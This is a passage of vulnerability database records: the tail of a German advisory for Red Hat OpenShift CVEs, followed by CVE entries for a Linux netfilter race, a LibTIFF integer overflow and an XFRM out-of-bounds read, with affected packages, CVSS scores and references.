"known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-28835" }, { "cve": "CVE-2024-28849", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-28849" }, { "cve": "CVE-2024-29180", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-29180" }, { "cve": "CVE-2024-2961", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-2961" }, { "cve": "CVE-2024-33599", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-33599" }, { "cve": "CVE-2024-33600", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-33600" }, { "cve": "CVE-2024-33601", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-33601" }, { "cve": "CVE-2024-33602", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-33602" } ] }
cve-2023-42756
Vulnerability from cvelistv5
Published
2023-09-28 13:55
Modified
2024-11-23 00:24
Severity ?
EPSS score ?
Summary
A flaw was found in the Netfilter subsystem of the Linux kernel. A race condition between IPSET_CMD_ADD and IPSET_CMD_SWAP can lead to a kernel panic due to the invocation of `__ip_set_put` on a wrong `set`. This issue may allow a local user to crash the system.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-42756 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2239848 | issue-tracking, x_refsource_REDHAT | |
https://seclists.org/oss-sec/2023/q3/242 |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 9 |
Unaffected: 0:5.14.0-427.13.1.el9_4 < * cpe:/a:redhat:enterprise_linux:9::crb cpe:/a:redhat:enterprise_linux:9::realtime cpe:/a:redhat:enterprise_linux:9::appstream cpe:/o:redhat:enterprise_linux:9::baseos cpe:/a:redhat:enterprise_linux:9::nfv |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T19:30:24.501Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-42756" }, { "name": "RHBZ#2239848", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2239848" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GISYSL3F6WIEVGHJGLC2MFNTUXHPTKQH/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPMICQ2HVZO5UAM5KPXHAZKA2U3ZDOO6/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5PDNWPKAP3WL5RQZ4RIDS6MG32OHH5R/" }, { "tags": [ "x_transferred" ], "url": "https://seclists.org/oss-sec/2023/q3/242" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-27T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the Netfilter subsystem of the Linux kernel. A race condition between IPSET_CMD_ADD and IPSET_CMD_SWAP can lead to a kernel panic due to the invocation of `__ip_set_put` on a wrong `set`. This issue may allow a local user to crash the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-362", "description": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T00:24:45.424Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-42756" }, { "name": "RHBZ#2239848", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2239848" }, { "url": "https://seclists.org/oss-sec/2023/q3/242" } ], "timeline": [ { "lang": "en", "time": "2023-09-20T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-27T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: netfilter: race condition between ipset_cmd_add and ipset_cmd_swap", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-42756", "datePublished": "2023-09-28T13:55:37.430Z", "dateReserved": "2023-09-13T11:03:47.962Z", "dateUpdated": "2024-11-23T00:24:45.424Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-40745
Vulnerability from cvelistv5
Published
2023-10-05 18:55
Modified
2024-11-24 11:55
Severity ?
EPSS score ?
Summary
LibTIFF is vulnerable to an integer overflow. This flaw allows remote attackers to cause a denial of service (application crash) or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2289 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-40745 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2235265 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T18:46:10.366Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2289", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2289" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-40745" }, { "name": "RHBZ#2235265", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235265" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231110-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.com/libtiff/libtiff", "defaultStatus": "unaffected", "packageName": "libtiff", "versions": [ { "lessThan": "4.6.0", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.4.0-12.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "compact-libtiff", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "compat-libtiff3", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "mingw-libtiff", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Arie Haenel (Intel ASSERT), Polina Frolov (Intel ASSERT), Yaakov Cohen (Intel ASSERT), and Yocheved Butterman (Intel ASSERT) for reporting this issue." } ], "datePublic": "2023-07-21T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "LibTIFF is vulnerable to an integer overflow. This flaw allows remote attackers to cause a denial of service (application crash) or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-190", "description": "Integer Overflow or Wraparound", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-24T11:55:53.781Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2289", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2289" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-40745" }, { "name": "RHBZ#2235265", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235265" } ], "timeline": [ { "lang": "en", "time": "2023-07-24T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-07-21T00:00:00+00:00", "value": "Made public." } ], "title": "Libtiff: integer overflow in tiffcp.c", "x_redhatCweChain": "CWE-190: Integer Overflow or Wraparound" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-40745", "datePublished": "2023-10-05T18:55:26.192Z", "dateReserved": "2023-08-25T09:21:36.657Z", "dateUpdated": "2024-11-24T11:55:53.781Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-39194
Vulnerability from cvelistv5
Published
2023-10-09 17:57
Modified
2024-11-15 17:03
Severity ?
EPSS score ?
Summary
A flaw was found in the XFRM subsystem in the Linux kernel. The specific flaw exists within the processing of state filters, which can result in a read past the end of an allocated buffer. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, potentially leading to an information disclosure.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-39194 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2226788 | issue-tracking, x_refsource_REDHAT | |
https://www.zerodayinitiative.com/advisories/ZDI-CAN-18111/ |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T18:02:05.299Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39194" }, { "name": "RHBZ#2226788", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2226788" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-18111/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-29T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the XFRM subsystem in the Linux kernel. The specific flaw exists within the processing of state filters, which can result in a read past the end of an allocated buffer. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, potentially leading to an information disclosure." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Low" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 3.2, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T17:03:42.956Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39194" }, { "name": "RHBZ#2226788", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2226788" }, { "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-18111/" } ], "timeline": [ { "lang": "en", "time": "2023-07-25T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-29T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: xfrm: out-of-bounds read in __xfrm_state_filter_match()", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-39194", "datePublished": "2023-10-09T17:57:50.354Z", "dateReserved": "2023-07-25T16:01:14.836Z", "dateUpdated": "2024-11-15T17:03:42.956Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-21012
Vulnerability from cvelistv5
Published
2024-04-16 21:26
Modified
2024-11-13 17:25
Severity ?
EPSS score ?
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Oracle Corporation | Java SE JDK and JRE |
